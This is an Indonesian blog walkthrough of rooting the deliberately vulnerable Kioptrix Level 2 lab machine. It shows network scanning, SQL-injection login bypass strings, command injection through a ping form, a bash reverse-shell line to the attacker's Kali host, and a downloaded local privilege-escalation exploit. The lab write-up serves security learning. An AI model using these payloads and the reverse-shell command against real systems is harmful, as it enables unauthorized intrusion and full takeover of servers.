Membobol Server Kioptrix Level 2

Pada minggu ini saya akan berbagi mengenai pengalaman saya bermain dengan server Kioptrik level 2. Ok langasung aja siapkan bahan — bahan nya ya. O ya tujuan dari sharing ini adalah mendapatkan privilage sebagai root. 😀 😀 😀

Bahan yang kita butuhkan :

1. OS linux (karena penulis ingin menekuni dunia linux, jadi pakai linux aja ya :D)

2. Download dan install VM WARE

Link : https://my.vmware.com/en/web/vmware/free#desktop_end_user_computing/vmware_workstation_player/15_0

Note: pilih sesuai OS yang sedang digunakan.

3. Download OS Kioptrix

Link : https://www.vulnhub.com/entry/kioptrix-level-11-2,23/

4. Download OS kali linux (penulis merekomendasikan OS kali linux versi vmware)

Link : https://www.offensive-security.com/kali-linux-vm-vmware-virtualbox-image-download/

Note: recomendasi pilih versi 64 bit saja

5. Jaringan Hostpot yang digunakan sebagai penghubung antar OS Kioptrix dan kali linux

Note: Menurut pengalaman penulis, menggunakan jaringan selain wifi/hostspot membuat koneksi antar OS tidak berjalan dengan baik. 😀

Langkah Pertama melakukan Scanning IP:

#Sebelum menjalankan mesin vmware pastikan setting mesin kali linux dan OS Kioptrix level 1 menjadi network adapter nya menjadi bridge dengan masuk pada menu virtual machine -> virtual machine settings -> network adapter -> pilih bridge.

#Jalankan mesin kali linux dan OS Kioptrixnya

#Lihat IP yang didapat kali linux dengan menggunakan

command line :

ifconfig

#Cari IP target dalam 1 local jaringan ini dengan menggunakan tools netdiscover.

Command line:

netdiscover -i eth0

Atau

netdiscover -r ip/subnet

Note:

Ip : didapat dari ifconfig kemudian ganti block terakhir menjadi 0

Ex: 10.10.60.114 => 10.10.60.0

Subnet : isi dengan 8, 16, atau 24 disesuaikan dengan jaringan anda

Command line :

netdiscover -r 10.10.60.0/16

Maka didapat data sebagai berikut. Dari data ini yang perlu diperhatikan adalah Hostname dengan nama VMware. Karena Kioptrix kita berjalan diatas VMware.

Untuk memvalidasi apakah IP tersebut adalah IP dari mesin Kioptrix kita dapat membuka IP tersebut (10.10.60.79) di browser. Jika tampilan yang muncul seperti gambar di bawah ini berrti IP tersebut valid.

Langkah Kedua Proses Enumeration / Scanning

Prose ini merupakan salah satu proses untuk mendapatkan informasi mengenai target kita, mulai dari versi OS, service, port, dll. Tools yang digunakan pada percobaan kali ini adalah menggunakan tools nmap.

Command line :

nmap -sV -sC ip_target

contoh:

nmap -sV -sC 10.10.60.79

Dari proses ini akan didapat informasi seperti tampilan dibawah ini :

Dari informasi di atas di dapat beberapa informasi penting yang mungkin bisa kita gunakan untuk melakukan exploitasi.

Langkah Ketiga Proses Validasi

Setelah kita menemukan beberapa informasi yang kita dapat dari tools nmap. Langkah selanjutnya adalah melakukan proses validasi. Proses validasi ini merupakan proses pengecekan/memvalidasi temuan sebelumnya apakah diantara temuan sebelumnya tersebut memiliki celah untuk kita sebagai pentester dapat masuk ke sistem Kioptrix.

Untuk mencari celah/vulner kita bisa mencarinya dengan menggunakan tools searchsploit atau bisa mengunjungi web https://www.exploit-db.com .

Untuk menggunakan searchsploit kita bisa menggunakan perintah seperti dibawah ini:

searchsploit <nama versi service>

Contoh :

searchsploit OpenSSH 3.9p1

Silahkan teman — teman melakukan validasi dari masing — masing informasi port yang sudah kita dapatkan sebelumnya.

Dari validasi yang kita dapatkan ternyata penulis belum menemukan exploitasi yang dapat membuat kita masuk ke dalam server Kioptrix level 2 ini.

Pasti teman — teman disini sedih karena setelah memvalidasi seluruh port yang kita temukan sebelumnya kita tidak mendapatkan hasil yang memuaskan. Tapi disinilah indahnya bermain sebagai pentester. 😀 😀 😀

selalu ingat bahwa untuk menjadi pentester harus memiliki slogan dalam diri “Tidak ada system yang aman” 😀 😀 😀 dan “try harder” .

Ok.. mari kita coba cari jalan lain untuk masuk kedalam server kioptrix.

Coba kita buka ip dari server kioptrix ini.

Dari web application ini kita mendapatkan form login, karena kita tidak mempunyai username dan password kita tidak bisa langsung masuk ke dalam web application ini. Oleh karena itu kita perlu membypass username tersebut. Salah satu caranya adalah menggunakan username di bawah ini:

Username : ‘or’’=’

Password : ‘or’’=’

atau

Username : admin’ —

Password : ‘

Setelah kita masuk kita akan ditunjukan sebuah form seperti di bawah ini :

Dari form ini dari penjelasannya kita dapat melakukan fungsi ping. Coba kita melakukan ping ke google.com seperti di bawah ini untuk memvalidasi apakah fungsi ini dapat melalukan command line ping.

Dan ternyata berhasil. Form ini dapat melakukan perintah command line sederhana. Berarti kita bisa melakukan command injection pada form tersebut. Coba kita manipulasi dengan membuat form tersebut untuk dapat melaksanakan 2 command line dalam 1 waktu dengan menambahkan “ ; “ antara command pertama dan kedua. Seperti pada gambar di bawah ini.

Hasilnya akan seperti di bawah ini:

Hasil di atas kita mendapatkan 2 command line yang di jalankan:

1. Ping ke google.com

2. Commnad line pwd untuk menunjukan directory yang sedang di buka.

Langkah ke empat melakukan reverse shell

Apa itu reverse shell? Reverse shell merupakan sebuah script yang akan digunakan untuk membuka koneksi TCP ke host dan port tertentu dan mendapatkan akses shell pada host dan port tujuan kita. Untuk langkah — langkahnya silahkan ikuti langkah — langkah di bawah ini:

#Jalankan netcat pada kali linux kita.

Command line:

nc -nlvp <port>

<port> : port yang ingin kita gunakan

Hasil setelah di running dengan port 1337, di sini terlihat port 1337 telah aktif

#Jalankan reverse shell pada command injection dengan memasukan script seperti di bawah ini:

Command line untuk reverse shell:

bash -i >& /dev/tcp/<ip target>/<port target> 0>&1

Penjalasan:

<ip target> : ip pada kali linux kita

<port target> : port yang kita buat pada netcat sebelumnya

Masukan command di bawah ini pada form command injection:

;bash -i >& /dev/tcp/10.10.60.218/1337 0>&1

Hasilnya akan seperti di bawah ini dan pilih submit:

Pada terminal kita sebelumnya hanya bertulisakan listening, tetapi setelah reverse shell di jalankan, bash shell server kioptrix sudah terhubung dengan terminal kita seperti pada gambar di bawah ini.

Untuk mengetahui privilage kita dalam server ini kita bisa mengetikkan “ id “ pada terminal bash ini seperti pada gambar di bawah ini.

Privilage yang kita dapat adalah sebagai user apache, untuk mendapatkan akses sebagai root kita perlu mencari vulner pada server ini.

Langkah ke lima mendapatkan privilage sebagai root

# Pada tahap ini penulis mencoba mencari vulner pada server kioptrix dengan melalui versi OS yang dipakai pada server kioptrix ini dengan menggunakan command line:

lsb_release -a

Di dapat hasil bahwa server kioptrix ini menggunakan OS centos versi 4.5 seperti pada gambar di bawah ini:

# Sekarang kita mencoba mencari exploit pada centos versi 4.5, bisa menggunakan tools “ searchsploit “ atau langsung pada www.exploit-db.com. Tapi penulis disini menggunakan www.google.com untuk mencari exploit tersebut seperti pada gambar di bawah ini:

Pilih pada daftar paling atas seperti pada gambar di atas sehingga akan menuju ke website www.exploit-db.com seperti pada gambar di bawah ini:

Kemudian klik download dan save file tersebut seperti pada gambar di bawah ini:

# Kita telah mendapatkan exploit untuk OS centos versi 4.5. Kemudian kita perlu mentransfer file exploit yang kita dapat tadi ke server kioptrix. Salah satu caranya menggunakan bantuan script python. Script python ini berguna untuk membuat semacam localhost atau local server karena pada pembelajar ini antara kali linux dan kioptrix berada dalam 1 jaringan local. Buka terminal baru dan arahkan dimana file exploit yang kita download tadi berada, kemudian jalankan script di bawah ini:

Script python :

python -m SimpleHTTPServer

Hasil run script :

Untuk melakukan pengecekan apakah server di kali linux kita sudah berjalan kita dapat mengecek di browser kita dengan membuka http://localhost:8000/ maka tampilannya akan seperti di bawah ini :

#Sekarang kembali ke terminal dimana kita melakukan reverse shell. Pada tahap ini kita perlu mendowload file dari server kali linux kita ke server kioptrix. Tapi sebelum kita mendowload kita perlu memindahkan directory ke tmp. Kenapa kita perlu memindahkan ke directory tmp karena pada directory ini semua user bisa melalukan read, write, dan execution. Untuk mendownload file dari server kali linux kita, kita bisa menggunakan command line :

Wget http://<ip_server_kalilinux>:<port>/9542.c

<ip_server_kalilinux> : 10.10.60.218

<port> : 8000

Sehingga hasilnya seperti gambar di bawah ini:

# Setelah download file exploit 9542.c selesai, kita perlu melakukan compiling dan menjalankan program exploit tersebut dengan menggunakan script di bawah ini:

Compiling file 9542.c

gcc -o <nama_setelah_dicompile> <file target>

Dan kemudian langsung kita jalankan compile file tersebut seperti pada gambar di bawah ini.

Taraaaa !!!! 😀 😀 😀 setelah kita menjalankan file exploit tersebut kemudian kita cek privilage kita dengan melakukan command “ id “. Kita mendapatkan bahwa posisi kita sudah sebagai privilage root.

Hore pembelajaran kita berhasil… jangan pernah menyerah… karena tidak ada system yang aman 😀 😀 😀

Sampai ketemu di sharing — sharing selanjutnya ya… SEMANGAT!!! 😀 😀 😀

Tinggalkan komentar